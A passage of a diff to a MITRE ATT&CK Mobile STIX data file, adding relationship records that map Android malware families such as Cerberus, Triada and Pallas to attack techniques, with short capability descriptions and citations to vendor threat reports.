Cerberus - A new banking Trojan from the underworld. Retrieved June 26, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Cerberus](https://attack.mitre.org/software/S0480) can generate fake notifications and launch overlay attacks against attacker-specified applications.(Citation: Threat Fabric Cerberus)", + "modified": "2022-04-12T10:01:44.682Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--037f44f0-0c07-4c7f-b40e-0325b5b228a9", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--2a1d27a5-8149-4a6c-bbb7-6db83ce3a7ce", + "type": "relationship", + "created": "2020-12-18T20:14:47.339Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "WhiteOps TERRACOTTA", + "url": "https://www.whiteops.com/blog/terracotta-android-malware-a-technical-study", + "description": "Satori Threat Intelligence and Research Team. (2020, August). TERRACOTTA Android Malware: A Technical Study. Retrieved December 18, 2020." 
+ } + ], + "modified": "2020-12-18T20:14:47.339Z", + "description": "[TERRACOTTA](https://attack.mitre.org/software/S0545) has used timer events in React Native to initiate the foreground service.(Citation: WhiteOps TERRACOTTA)", + "relationship_type": "uses", + "source_ref": "malware--e296b110-46d3-4f7a-894c-cc71ea50168c", + "target_ref": "attack-pattern--00290ac5-551e-44aa-bbd8-c4b913488a6d", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--12098dee-27b3-4d0b-a15a-6b5955ba8879", + "type": "relationship", + "created": "2019-09-04T14:28:16.426Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. Retrieved September 4, 2019.", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf", + "source_name": "Lookout-Monokle" + } + ], + "modified": "2019-09-04T14:32:13.000Z", + "description": "[Monokle](https://attack.mitre.org/software/S0407) uses XOR to obfuscate its second stage binary.(Citation: Lookout-Monokle)", + "relationship_type": "uses", + "source_ref": "malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--17e94f34-e367-491c-9f9f-79294e124b4f", + "created": "2020-12-17T20:15:22.501Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Palo Alto HenBox", + "description": "A. Hinchliffe, M. Harbison, J. Miller-Osborn, et al. 
(2018, March 13). HenBox: The Chickens Come Home to Roost. Retrieved September 9, 2019.", + "url": "https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:22:48.246Z", + "description": "[HenBox](https://attack.mitre.org/software/S0544) can intercept SMS messages.(Citation: Palo Alto HenBox)", + "relationship_type": "uses", + "source_ref": "malware--aef537ba-10c2-40ed-a57a-80b8508aada4", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--f5fab17b-43e7-46ff-bdea-eb8c52a0c6c3", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-PegasusAndroid", + "description": "Mike Murray. (2017, April 3). Pegasus for Android: the other side of the story emerges. 
Retrieved April 16, 2017.", + "url": "https://blog.lookout.com/blog/2017/04/03/pegasus-android/" + } + ], + "modified": "2019-08-09T17:52:31.854Z", + "description": "[Pegasus for Android](https://attack.mitre.org/software/S0316) accesses the list of installed applications.(Citation: Lookout-PegasusAndroid)", + "relationship_type": "uses", + "source_ref": "malware--93799a9d-3537-43d8-b6f4-17215de1657c", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--de69fd86-aaef-4a1e-99e9-ee32c71997d6", + "created": "2022-04-05T19:54:12.660Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-05T19:54:12.660Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--52651225-0b3a-482d-aa7e-10618fd063b5", + "target_ref": "attack-pattern--0f4fb01b-d57a-4375-b7a2-342c9d3248f7", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--1cc71849-142f-4097-9546-7946b0b546a6", + "created": "2020-04-08T15:51:25.125Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "ThreatFabric Ginp", + "description": "ThreatFabric. (2019, November). Ginp - A malware patchwork borrowing from Anubis. 
Retrieved April 8, 2020.", + "url": "https://www.threatfabric.com/blogs/ginp_a_malware_patchwork_borrowing_from_anubis.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:29:22.884Z", + "description": "[Ginp](https://attack.mitre.org/software/S0423) can determine if it is running in an emulator.(Citation: ThreatFabric Ginp)", + "relationship_type": "uses", + "source_ref": "malware--6146be90-470c-4049-bb3a-9986b8ffb65b", + "target_ref": "attack-pattern--6ffad4be-bfe0-424f-abde-4d9a84a800ad", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--35a12ae8-562d-4e24-979e-ef970dde0b94", + "created": "2022-04-15T17:52:24.125Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-15T17:52:24.125Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--3b0b604f-10db-41a0-b54c-493124d455b9", + "target_ref": "attack-pattern--08e22979-d320-48ed-8711-e7bf94aabb13", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--d8d773ab-b0e3-484b-bdb8-c1a1ab48d218", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://researchcenter.paloaltonetworks.com/2017/07/unit42-spydealer-android-trojan-spying-40-apps/", + "description": "Wenjun Hu, Cong Zheng and Zhi Xu. 
(2017, July 6). SpyDealer: Android Trojan Spying on More Than 40 Apps. Retrieved September 18, 2018.", + "source_name": "PaloAlto-SpyDealer" + } + ], + "modified": "2019-08-09T17:56:05.686Z", + "description": "[SpyDealer](https://attack.mitre.org/software/S0324) uses the commercial rooting app Baidu Easy Root to gain root privilege and maintain persistence on the victim.(Citation: PaloAlto-SpyDealer)", + "relationship_type": "uses", + "source_ref": "malware--86fc6f0c-86d9-473e-89f3-f50f3cb9319b", + "target_ref": "attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c41d817e-913e-4574-b8d4-370de9f0034b", + "created": "2019-11-18T14:47:25.327Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Google Triada June 2019", + "description": "Lukasz Siewierski. (2019, June 6). PHA Family Highlights: Triada. Retrieved July 16, 2019.", + "url": "https://security.googleblog.com/2019/06/pha-family-highlights-triada.html" + }, + { + "source_name": "Kaspersky Triada March 2016", + "description": "Snow, J. (2016, March 3). Triada: organized crime on Android. Retrieved July 16, 2019.", + "url": "https://www.kaspersky.com/blog/triada-trojan/11481/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:19:16.331Z", + "description": "[Triada](https://attack.mitre.org/software/S0424) injects code into the Zygote process to effectively include itself in all forked processes. 
Additionally, code is injected into the Android Play Store App, web browser applications, and the system UI application.(Citation: Google Triada June 2019)(Citation: Kaspersky Triada March 2016)", + "relationship_type": "uses", + "source_ref": "malware--f082fc59-0317-49cf-971f-a1b6296ebb52", + "target_ref": "attack-pattern--1ff89c1b-7615-4fe8-b9cb-63aaf52e6dee", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--12d61e7d-7fa6-422d-9817-901decf6b650", + "created": "2019-07-10T15:35:43.663Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Lookout Dark Caracal Jan 2018", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Pallas](https://attack.mitre.org/software/S0399) uses phishing popups to harvest user credentials.(Citation: Lookout Dark Caracal Jan 2018)", + "modified": "2022-04-12T10:01:44.682Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--c41a8b7c-3e42-4eee-b87d-ad8a100ee878", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--6a4fd7bd-b73b-403b-aff9-8be6bc0afc7b", + "type": "relationship", + "created": "2020-09-14T14:13:45.259Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout eSurv", + "url": "https://blog.lookout.com/esurv-research", + "description": "A. Bauer. (2019, April 8). Lookout discovers phishing sites distributing new iOS and Android surveillanceware. Retrieved September 11, 2020." + } + ], + "modified": "2020-09-14T14:13:45.259Z", + "description": "[eSurv](https://attack.mitre.org/software/S0507) can exfiltrate device pictures.(Citation: Lookout eSurv)", + "relationship_type": "uses", + "source_ref": "malware--680f680c-eef9-4f8a-b5f5-f451bf47e403", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f56b8307-80e3-4d73-869f-1e8b9538dbc4", + "created": "2022-09-29T21:22:06.716Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Cylance Dust Storm", + "description": "Gross, J. (2016, February 23). 
Operation Dust Storm. Retrieved December 22, 2021.", + "url": "https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-30T18:45:10.156Z", + "description": "During [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), the threat actors used Android backdoors to continually forward all SMS messages and call information back to their C2 servers.(Citation: Cylance Dust Storm)", + "relationship_type": "uses", + "source_ref": "campaign--4603cf2f-06d0-4970-9c5d-5071b08c817f", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--59c2bfb5-a55b-43d3-b1e9-3fbaff0fb7fc", + "created": "2023-03-20T18:14:50.401Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:47:25.861Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6", + "target_ref": "attack-pattern--a91262d5-b9ff-463f-b8d2-12e4ea1eb3c9", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--da424f3f-8a93-4a66-858c-b33f587108e6", + "type": "relationship", + "created": "2020-10-29T17:48:27.225Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", 
+ "external_references": [ + { + "source_name": "Threat Fabric Exobot", + "url": "https://www.threatfabric.com/blogs/exobot_android_banking_trojan_on_the_rise.html", + "description": "Threat Fabric. (2017, February). Exobot - Android banking Trojan on the rise. Retrieved October 29, 2020." + } + ], + "modified": "2020-10-29T17:48:27.225Z", + "description": "[Exobot](https://attack.mitre.org/software/S0522) can obtain the device’s country and carrier name.(Citation: Threat Fabric Exobot)", + "relationship_type": "uses", + "source_ref": "malware--c91cec55-634c-4670-ba10-2dc7ceb28e98", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--5c7508ae-5d05-49fd-a489-b944d3b45dd0", + "type": "relationship", + "created": "2020-12-24T22:04:27.997Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." 
+ } + ], + "modified": "2020-12-24T22:04:27.997Z", + "description": "[GoldenEagle](https://attack.mitre.org/software/S0551) has tracked location.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--0b9c5d11-651a-4378-b129-5c584d0242c5", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2d3198ff-a481-47ec-ae64-13d7be706929", + "created": "2023-02-28T21:41:47.503Z", + "revoked": false, + "external_references": [ + { + "source_name": "cloudmark_tanglebot_0921", + "description": "Felipe Naves, Andrew Conway, W. Stuart Jones, Adam McNeil . (2021, September 23). TangleBot: New Advanced SMS Malware Targets Mobile Users Across U.S. and Canada with COVID-19 Lures. Retrieved February 28, 2023.", + "url": "https://www.cloudmark.com/en/blog/malware/tanglebot-new-advanced-sms-malware-targets-mobile-users-across-us-and-canada-covid-19" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-02-28T21:41:47.503Z", + "description": "[TangleBot](https://attack.mitre.org/software/S1069) can record video from the device camera.(Citation: cloudmark_tanglebot_0921)", + "relationship_type": "uses", + "source_ref": "malware--68156e5a-4c3a-46dd-9c5e-c0bfdec6651f", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--2fcc6291-9a68-45c2-a5c5-94b1973ed3d2", + "created": 
"2022-04-01T13:27:29.919Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-01T13:27:29.920Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--e8b4e1ec-8e3b-484c-9038-4459b1ed8060", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--312950f2-80d2-4941-bfce-b97b2cb7a1ff", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. Retrieved April 11, 2018.", + "source_name": "Lookout Dark Caracal Jan 2018" + } + ], + "modified": "2019-07-16T15:35:21.063Z", + "description": "(Citation: Lookout Dark Caracal Jan 2018)", + "relationship_type": "uses", + "source_ref": "intrusion-set--8a831aaa-f3e0-47a3-bed8-a9ced744dd12", + "target_ref": "malware--a5528622-3a8a-4633-86ce-8cdaf8423858", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f4d5e619-7c83-4845-aecd-de62c33cc0a1", + "created": "2019-07-10T15:35:43.661Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Dark Caracal Jan 2018", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. 
Retrieved April 11, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:32:57.154Z", + "description": "[Pallas](https://attack.mitre.org/software/S0399) captures and exfiltrates all SMS messages, including future messages as they are received.(Citation: Lookout Dark Caracal Jan 2018)", + "relationship_type": "uses", + "source_ref": "malware--c41a8b7c-3e42-4eee-b87d-ad8a100ee878", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8f2929a9-cd25-4e07-b402-447da68aaa56", + "created": "2020-04-24T15:06:33.455Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "TrendMicro Coronavirus Updates", + "description": "T. Bao, J. Lu. (2020, April 14). Coronavirus Update App Leads to Project Spy Android and iOS Spyware. 
Retrieved April 24, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:10:43.246Z", + "description": "[Corona Updates](https://attack.mitre.org/software/S0425) communicates with the C2 server using HTTP requests.(Citation: TrendMicro Coronavirus Updates)", + "relationship_type": "uses", + "source_ref": "malware--366c800f-97a8-48d5-b0a6-79d00198252a", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e4f90a20-f1c6-4820-8c3e-751c79cc82e8", + "created": "2023-03-20T18:56:24.246Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:56:24.246Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--4c58b7c6-a839-4789-bda9-9de33e4d4512", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8634a732-1c5e-4931-a24f-cdcc2f81c788", + "created": "2020-05-07T15:33:32.903Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "CheckPoint Agent Smith", + "description": "A. Hazum, F. He, I. Marom, B. Melnykov, A. Polkovnichenko. (2019, July 10). 
Agent Smith: A New Species of Mobile Malware. Retrieved May 7, 2020.", + "url": "https://research.checkpoint.com/2019/agent-smith-a-new-species-of-mobile-malware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:20:05.166Z", + "description": "[Agent Smith](https://attack.mitre.org/software/S0440) deletes infected applications’ update packages when they are detected on the system, preventing updates.(Citation: CheckPoint Agent Smith)", + "relationship_type": "uses", + "source_ref": "malware--a6228601-03f6-4949-ae22-c1087627a637", + "target_ref": "attack-pattern--ab7400b7-3476-4776-9545-ef3fa373de63", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--9858ae0b-140b-4dd2-8ba9-1ef22183dec3", + "created": "2021-02-08T16:36:20.788Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "BlackBerry Bahamut", + "url": "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf", + "description": "The BlackBerry Research & Intelligence Team. (2020, October). BAHAMUT: Hack-for-Hire Masters of Phishing, Fake News, and Fake Apps. Retrieved February 8, 2021." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Windshift](https://attack.mitre.org/groups/G0112) has included keylogging capabilities as part of Operation ROCK.(Citation: BlackBerry Bahamut)", + "modified": "2022-04-15T17:35:26.197Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1", + "target_ref": "attack-pattern--b1c95426-2550-4621-8028-ceebf28b3a47", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--70ec9e67-b755-41ee-a1db-71d250a90b4e", + "type": "relationship", + "created": "2020-01-14T17:47:08.826Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SecureList DVMap June 2017", + "url": "https://securelist.com/dvmap-the-first-android-malware-with-code-injection/78648/", + "description": "R. Unuchek. (2017, June 8). Dvmap: the first Android malware with code injection. Retrieved December 10, 2019." 
+ } + ], + "modified": "2020-01-14T17:47:08.826Z", + "description": "[Dvmap](https://attack.mitre.org/software/S0420) checks the Android version to determine which system library to patch.(Citation: SecureList DVMap June 2017)", + "relationship_type": "uses", + "source_ref": "malware--22b596a6-d288-4409-8520-5f2846f85514", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--def81edd-4410-47b2-a80f-d47b3f353f54", + "created": "2023-03-16T18:27:42.656Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-16T18:27:42.656Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--cc49561f-8364-4908-9111-ad3a6dcd922c", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2018-10-17T00:14:20.652Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--11bd699b-f2c2-4e48-bf46-fb3f8acd9799", + "target_ref": "attack-pattern--0d95940f-9583-4e0f-824c-a42c1be47fad", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": 
"relationship--a501b700-250f-4e9a-a20f-656ae9bf90f9", + "type": "relationship", + "created": "2020-12-24T21:55:56.753Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2020-12-24T21:55:56.753Z", + "description": "[DoubleAgent](https://attack.mitre.org/software/S0550) has used exploit tools to gain root, such as TowelRoot.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--3d6c4389-3489-40a3-beda-c56e650b6f68", + 